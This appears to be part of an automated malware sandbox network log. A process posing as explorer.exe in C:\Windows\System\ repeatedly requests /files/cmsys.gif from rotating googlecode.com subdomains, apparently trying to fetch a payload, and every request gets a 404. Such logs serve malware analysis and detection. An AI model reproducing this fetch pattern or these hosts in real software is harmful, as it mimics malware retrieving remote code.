                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:30.832714081 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:30 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:30.832822084 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    72192.168.2.560722108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:31.114658117 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:32.027282953 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:31 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:32.027335882 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    73192.168.2.560723142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:32.242907047 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.174428940 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:33 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.174493074 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    74192.168.2.56072564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:35.176805019 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:36.108943939 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:35 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:36.108989954 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    75192.168.2.560726108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:36.305176973 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:37.225480080 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:37 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:37.225604057 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    76192.168.2.560727142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:37.750168085 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.664053917 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:38 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.664098024 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    77192.168.2.56072964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:40.760385036 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:41.682709932 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:41 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
